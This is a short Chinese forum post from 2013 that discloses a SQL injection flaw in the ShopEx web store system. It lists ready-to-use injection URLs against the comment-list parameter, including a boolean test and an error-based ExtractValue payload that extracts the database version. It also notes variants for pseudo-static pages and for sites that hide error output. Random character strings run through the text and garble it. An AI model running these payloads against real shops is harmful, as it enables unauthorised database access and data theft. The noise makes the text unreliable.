注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… , n3 O+ {+ U8 Y% `
: ? S/ Z4 H( G2 l- h3 B
好吧,我扯远了~~1 g1 v B7 w# q' k3 V, l! y
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~; C, \1 v4 w1 Q) ^1 r/ r
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: ! A3 e8 K' X1 t- Z& d# x
* d/ n$ G% F5 l( n9 x, P6 E- }
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
8 B. r! n% x8 O/ i5 w
; f5 F+ N2 Z. ]. _- R: q" Y# Ahttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
6 O2 `6 x6 @' i- ^4 g8 K6 K# ~) ~5 l- O9 {# H
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html ) E7 F, A- l' _' f8 ]8 h3 y8 E: X* d
$ m1 i3 O. v9 z" ^http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html ; B+ x' `3 T+ O& H' y
3 ^/ a8 U* R0 F# ~0 K# p% H
1 Z/ S4 T4 V) T) ^' G一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。; j3 V2 _4 ]7 {" c5 ]& ]& A
如何注入就不多说了,10多年的东西了…不会也会了… $ i ^+ Q0 ~& B8 V% l8 ]
" g9 O2 r( R8 v' |) X
# J) `- k* h3 L: Y0 G" j# l
: [$ p. f8 f3 }: w9 m
6 A7 g' Z2 b' r4 D, T8 V' z |
发表于 2013-2-19 08:31:27
收藏
支持
反对